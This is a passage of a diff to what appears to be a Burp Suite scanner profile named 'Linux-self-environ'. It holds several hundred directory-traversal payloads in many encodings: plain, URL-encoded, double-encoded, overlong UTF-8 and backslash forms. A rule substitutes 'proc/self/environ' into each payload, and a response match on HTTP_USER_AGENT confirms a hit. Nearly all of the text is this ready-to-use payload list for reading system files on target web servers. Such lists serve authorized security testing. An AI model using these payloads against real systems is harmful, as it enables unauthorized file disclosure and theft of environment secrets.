.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,HTTP_USER_AGENT"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-self-environ","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-self-environ","RemediationDetail":"","IssueBackground":"Linux-self-environ","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"proc/self/environ","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Linux-self-environ", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + "true,../{FILE}", + "true,../../{FILE}", + "true,../../../{FILE}", + "true,../../../../{FILE}", + "true,../../../../../{FILE}", + "true,../../../../../../{FILE}", + "true,../../../../../../../{FILE}", + "true,../../../../../../../../{FILE}", + "true,..%2f{FILE}", + "true,..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}", + "true,%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}", + "true,%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}", + "true,..%252f{FILE}", + "true,..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}", + "true,%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}", + "true,%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}", + "true,..\\{FILE}", + "true,..\\..\\{FILE}", + "true,..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}", + "true,..%255c{FILE}", + "true,..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}", + "true,..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}", + "true,%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}", + "true,%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}", + "true,%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}", + "true,%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}", + "true,..%c0%af{FILE}", + "true,..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}", + "true,%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}", + "true,%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}", + "true,..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}", + "true,..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}", + "true,%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\{FILE}", + "true,%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}", + "true,..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}", + "true,..%%32%66{FILE}", + "true,..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}", + "true,..%%35%63{FILE}", + "true,..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}", + "true,%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + "true,%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}", + 